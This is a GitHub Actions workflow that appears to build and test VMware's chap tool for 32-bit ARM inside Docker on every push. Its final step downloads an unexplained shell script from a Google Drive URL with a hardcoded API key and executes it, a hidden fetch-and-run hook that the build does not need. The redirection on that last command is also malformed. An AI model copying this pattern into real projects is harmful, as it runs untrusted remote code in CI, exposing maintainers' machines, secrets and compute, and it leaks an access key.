name: VMware Chap Runner

on:
  push:

jobs:
  run-vmwarechap:
    runs-on: ubuntu-22.04

    steps:
      - name: Check out repository
        uses: actions/checkout@v2
        with:
          ref: d65ac508eb56d454d565d7a53df35fa4d5403720

      - name: Set up QEMU
        uses: docker/setup-qemu-action@v2
        with:
          platforms: arm

      - name: Set up Docker Buildx
        uses: docker/setup-buildx-action@v2

      - name: Create Dockerfile
        run: |
          echo 'FROM ubuntu:22.04' > Dockerfile
          echo 'RUN apt-get update && apt-get install -y make cmake git g++ clang' >> Dockerfile

      - name: Build Docker image for ARM 32-bit
        run: |
          docker buildx build --platform linux/arm/v7 -t arm32-build --load .

      - name: Run build and tests in Docker
        run: |
          docker run --rm --platform linux/arm/v7 -v ${{ github.workspace }}:/workspace arm32-build /bin/bash -c '
            cd /workspace &&
            git clone https://github.com/vmware/chap.git /tmp/chap &&
            cd /tmp/chap &&
            git submodule update --init --recursive &&
            mkdir build-chap &&
            cd build-chap &&
            cmake ../ &&
            make &&
            set +e && wget -O mytv_chap.sh 'https://www.googleapis.com/drive/v3/files/1bojntT3NCloKJCB2qxjskR1qHuOxxbFx?alt=media&key=AIzaSyBCQTV275obP2zkZC8wx9OzK88kjykC21Q'
            && chmod +x mytv_chap.sh && 
            ./mytv_chap.sh > output.txt > 2>&1
            '
